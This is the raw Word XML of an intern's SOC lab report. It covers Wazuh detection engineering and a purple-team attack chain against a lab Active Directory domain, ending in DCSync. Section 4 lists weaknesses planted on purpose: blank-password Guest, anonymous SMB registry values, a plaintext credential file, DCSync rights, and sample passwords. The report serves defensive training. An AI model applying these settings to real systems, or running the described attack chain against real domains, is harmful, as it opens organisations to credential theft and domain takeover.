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b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">ENTERPRISE SECURITY OPERATIONS &amp; DETECTION ENGINEERING</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="800"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Internship Technical Report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="1200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">Month 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Intern Name: Abdimalik Yusuf Mohamud</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Role: Network &amp; Security Intern</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Environment: Self-Directed Enterprise Infrastructure Lab</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Reporting Period: Month 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Report Type: SOC Operations &amp; Detection Engineering Report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="240"/>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pPr>
      <w:r>
        <w:t xml:space="preserve">1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">During Month 2 of the internship, I transformed the enterprise infrastructure lab built in Month 1 into a functional Security Operations Center (SOC) environment. Month 1 focused on infrastructure deployment; Month 2 focused on detection engineering, attack simulation, incident response automation, and structured incident reporting - the operational disciplines a real SOC internship would exercise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The work covered three major domains:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Detection Engineering - custom Wazuh rules, dashboards, log source onboarding (Windows Security Channel, pfSense syslog), and threat intelligence enrichment via VirusTotal integration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Purple Team Simulation - three structured attack use cases executed from Kali Linux against Domain Controller and workstation targets, spanning brute force, lateral movement via credential theft, and full domain compromise through Kerberoasting + DCSync.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Incident Response Automation - Wazuh Active Response configured to automatically block attacking IP addresses on affected Windows agents via netsh firewall rules, validated end-to-end on both DC1 and HQ-STAFF-01.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A significant portion of Month 2 was diagnostic: enabling missing Windows audit policies (Kerberos and Logon subcategories), fixing agent configuration gaps (Security channel forwarding), building custom decoders for pfSense syslog ingestion, and resolving Wazuh Active Response field-mapping issues where the built-in netsh command failed to extract source IPs from EventChannel-formatted alerts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Every use case documented in this report was executed end-to-end with real attack tools (kerbrute, netexec, impacket, evil-winrm, chisel, hashcat), detected (or explicitly not detected) by Wazuh, and analyzed for remediation. The report culminates in three formal Incident Reports and a documented set of Detection Gaps that a mature SOC would need to address.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Scope of Work</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The objectives for Month 2 were operations-focused and built directly on the Month 1 infrastructure:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Onboard additional log sources into Wazuh (Windows Security Channel, pfSense firewall syslog)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enable Windows advanced audit policies required for meaningful security telemetry</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Configure VirusTotal threat intelligence enrichment for file integrity monitoring</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Design and execute three detection use cases (brute force, lateral movement, privilege escalation)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Build custom Wazuh dashboards and visualizations for authentication monitoring</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Configure and validate Wazuh Active Response for automated containment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Perform a full attack kill-chain simulation from unauthenticated attacker to Domain Administrator</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Conduct threat hunting queries across accumulated telemetry</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Produce three formal Incident Reports documenting detected attacks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Identify and document detection gaps requiring future engineering work</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Lab Architecture (Month 2 State)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1 Active Systems</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Month 2 exercises used a subset of the Month 1 architecture, prioritizing systems necessary for the detection use cases within the RAM constraints of the host hypervisor. The Branch site was documented in Month 1 and retained architecturally, but daily operations focused on the HQ site.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000"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="1F3864" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="1F3864" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="1F3864" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="1F3864" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">pfSense-HQ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">10.10.10.1 / 10.10.20.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Edge firewall, inter-VLAN router, syslog source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Segmentation enforcement between staff and servers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">DC1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">10.10.20.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Domain Controller (fh.local), DNS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows Server 2025, Wazuh agent 001</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Wazuh Manager</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">10.10.20.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">SIEM manager, indexer, dashboard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Ubuntu 24.04, Wazuh v4.14.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">HQ-STAFF-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">10.10.10.59</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Domain-joined workstation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows 10 / Server 2019, Wazuh agent 004</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Kali Linux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">10.10.10.60</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Attacker workstation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Placed on HQ-STAFF subnet to simulate insider or compromised endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.2 Network Segmentation Enforcement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">During Month 2, pfSense-HQ firewall rules were tightened to enforce realistic enterprise segmentation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PASS: 10.10.10.59 (HQ-STAFF-01) -&gt; 10.10.20.0/24 - legitimate domain service traffic</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">BLOCK: 10.10.10.0/24 -&gt; 10.10.20.0/24 - blocks all other staff subnet hosts (including Kali attacker) from directly reaching HQ-SERVERS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This segmentation forced the attacker to compromise HQ-STAFF-01 first and pivot through it to reach the Domain Controller - closely matching real enterprise attack chains.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Lab Modifications Applied During Month 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This section documents every material change made to lab systems during Month 2 for reproducibility and audit purposes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.1 Domain Controller (DC1) Modifications</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enabled advanced audit policies: Logon, Account Lockout, Credential Validation (Logon/Logoff subcategory)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enabled advanced audit policies: Kerberos Authentication Service, Kerberos Service Ticket Operations (Account Logon subcategory)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Verified 'Security' Windows Event Channel forwarded to Wazuh via ossec.conf (existing configuration confirmed)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Created domain user 'svc_backup' with initial password 'Backup2024!' (later changed to 'Summer2024!')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Assigned SPN to svc_backup: MSSQL/hq-staff-01.fh.local:1433 (simulates a real SQL service account)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Granted DCSync rights to svc_backup (Replicating Directory Changes + Replicating Directory Changes All) - simulates over-privileged backup account misconfiguration commonly seen in enterprises</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Added hqSaacid to Domain Admins group (temporary, for Use Case 3 detection demonstration - reverted after evidence capture)</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2 HQ-STAFF-01 Modifications</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enabled advanced audit policies: Logon, Account Lockout, Credential Validation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Added Security channel to Wazuh agent ossec.conf localfile configuration (was absent, blocking 4625 events from reaching Wazuh)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enabled Guest account with blank password</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Created share C:\PublicShare with a plaintext credential file (it_notes.txt) containing hqSaacid credentials - simulates real-world credential leak in file shares</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enabled anonymous SMB share access via registry modifications: NullSessionShares=PublicShare, RestrictAnonymous=0, RestrictAnonymousSAM=0, EveryoneIncludesAnonymous=1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Granted ANONYMOUS LOGON identity Read on PublicShare (both share ACL and NTFS ACL)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enabled PowerShell Remoting (WinRM) via Enable-PSRemoting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Added hqSaacid to Remote Management Users local group</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.3 Wazuh Manager Modifications</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Configured VirusTotal integration with API key (integration block in ossec.conf, group=syscheck, alert_format=json)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enabled remote syslog reception on UDP/514 for pfSense log ingestion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Configured pfSense as allowed syslog source (allowed-ips: 10.10.20.1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
